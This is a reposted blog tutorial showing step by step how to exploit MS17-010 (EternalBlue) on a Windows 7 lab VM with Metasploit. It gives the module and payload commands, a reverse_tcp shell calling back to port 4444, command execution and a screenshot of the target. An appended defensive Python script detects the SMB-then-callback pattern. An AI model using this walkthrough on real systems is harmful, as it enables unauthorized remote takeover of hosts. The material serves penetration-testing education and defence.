
MSF practice: the harm of the MS17-010 vulnerability

2022-06-09 09:49:00 Always a teenager

Today we continue with penetration testing knowledge. The main content of this article is an actual penetration test of a Windows 7 host with MSF.

Disclaimer:
The content introduced in this article is for learning and exchange only. Using the techniques in this text for illegal acts is strictly prohibited; otherwise you will bear all the serious consequences!
Again: penetration testing of unauthorized equipment is forbidden!

1. MS17-010 vulnerability overview

On April 14, 2017, the hacker group Shadow Brokers released a large number of cyber attack tools, among them the "EternalBlue" tool. It exploits a vulnerability in the SMB service of Windows systems and can thereby obtain the highest privileges on the system. On May 12 of that year, other attackers used the "EternalBlue" vulnerability to build the WannaCry ransomware, and many enterprises and universities around the world were hit on their intranets.
In MSF, EternalBlue corresponds to the exploit module numbered MS17-010.

2. MSF module selection and use

First, we choose the MSF module by running:

search name:ms17-010

The results are shown below:
[screenshot of the search results]
Here we select module 0 from the figure above and run:

use exploit/windows/smb/ms17_010_eternalblue

After selecting the module, we run:

show options

This shows the parameters of the attack module; the results are shown below:
[screenshot of the show options output]
As the figure above shows, most of the attack parameters are already set. The one we need to set ourselves is RHOSTS, so we run:

set RHOSTS 192.168.136.77

In the command above, the RHOSTS parameter is the target host, that is, the device being penetration tested. Here we set it to a Windows 7 VMware virtual machine.

3. Attack payload settings

Next, we also need to set the attack payload.
Put simply, the module chosen earlier decides how the target system is attacked, while the attack payload (Payload) decides what to do once the system has been compromised.
In newer versions of MSF, selecting this module automatically configures an attack payload for us, as shown below:
[screenshot of the payload options]
Notice in the figure above that the reverse_tcp payload is used. After a successful attack, this payload opens a TCP connection back to the specified port on the specified device and lets us execute shell commands. The LHOST and LPORT in the payload above are the IP address and port number of that device; here MSF has automatically set LHOST to this machine's IP address and LPORT to 4444 (an unusual port number).

4. Running the exploit in MSF and viewing the result

After completing the configuration above, we run:

run

which executes the module. The result of this command is as follows:
[screenshot of the run output]
Next, let's check the result of the MSF penetration test: in the reverse shell we execute a command as a test, and the results are shown below:
[screenshot of commands run in the reverse shell]
As you can see, we can execute Windows commands.
Afterwards, we run:

screenshot

This command captures the current state of the screen and saves it as an image. The result of this command is as follows:
[screenshot of the screenshot command output]
As the figure above shows, the screenshot of the target host is saved under /root/. Opening the image gives the following:
[the captured screenshot of the target host]
The above fully demonstrates the harm of the MS17-010 vulnerability!
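For the defender's side of the walkthrough above, here is an added example (not part of the original post) of detection logic that correlates an inbound SMB connection on port 445 with a subsequent outbound TCP connection from the same host back to port 4444, the reverse_tcp listener port used above. The pipe-delimited log format, the 5-minute window and the hosts other than 192.168.136.77 are assumptions, and the log lines are constructed.

```python
from datetime import datetime, timedelta

# Constructed connection-log lines (not real data): timestamp|src_ip|src_port|dst_ip|dst_port|proto
SAMPLE_LOG = """\
2022-06-09 09:50:01|192.168.136.10|50522|192.168.136.77|445|tcp
2022-06-09 09:50:03|192.168.136.77|49211|192.168.136.10|4444|tcp
2022-06-09 10:10:00|192.168.136.20|51000|192.168.136.80|445|tcp
2022-06-09 10:30:00|192.168.136.80|49300|192.168.136.20|4444|tcp
2022-06-09 11:00:00|192.168.136.30|52000|192.168.136.90|445|tcp
"""

SMB_PORT = 445
REVERSE_SHELL_PORTS = {4444}          # the LPORT MSF set for the reverse_tcp payload above
WINDOW = timedelta(minutes=5)         # assumed: callback must follow the SMB contact within this window

def parse_line(line):
    """Parse one pipe-delimited record into a dict with a datetime and integer ports."""
    ts, src, sport, dst, dport, proto = line.strip().split("|")
    return {"ts": datetime.strptime(ts, "%Y-%m-%d %H:%M:%S"),
            "src": src, "sport": int(sport), "dst": dst, "dport": int(dport), "proto": proto}

def find_smb_reverse_shell_pairs(log_text, window=WINDOW):
    """Return (victim, attacker, smb_time, callback_time) tuples for every host that
    received an SMB connection from `attacker` and then opened a TCP connection back
    to a reverse-shell port on that same `attacker` within `window`."""
    events = [parse_line(l) for l in log_text.splitlines() if l.strip()]
    events.sort(key=lambda e: e["ts"])
    smb_contacts = {}   # (victim, attacker) -> time of the most recent inbound SMB connection
    alerts = []
    for e in events:
        if e["proto"] != "tcp":
            continue
        if e["dport"] == SMB_PORT:
            smb_contacts[(e["dst"], e["src"])] = e["ts"]
        elif e["dport"] in REVERSE_SHELL_PORTS:
            key = (e["src"], e["dst"])        # victim -> attacker
            smb_time = smb_contacts.get(key)
            if smb_time is not None and timedelta(0) <= e["ts"] - smb_time <= window:
                alerts.append((e["src"], e["dst"], smb_time, e["ts"]))
    return alerts

if __name__ == "__main__":
    for victim, attacker, t_smb, t_cb in find_smb_reverse_shell_pairs(SAMPLE_LOG):
        print(f"ALERT {victim} received SMB from {attacker} at {t_smb:%H:%M:%S} "
              f"and connected back to port 4444 at {t_cb:%H:%M:%S}")
```

Only the 192.168.136.77 pair is reported: the second host's callback arrives 20 minutes after its SMB contact and falls outside the window, and the third host never calls back.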
Original writing is not easy. When reprinting, please credit the source: https://blog.csdn.net/weixin_40228200


Copyright notice
This article was written by [Always a teenager]; when reprinting, please include the original link. Thank you.
https://yzsam.com/2022/160/202206090922287338.html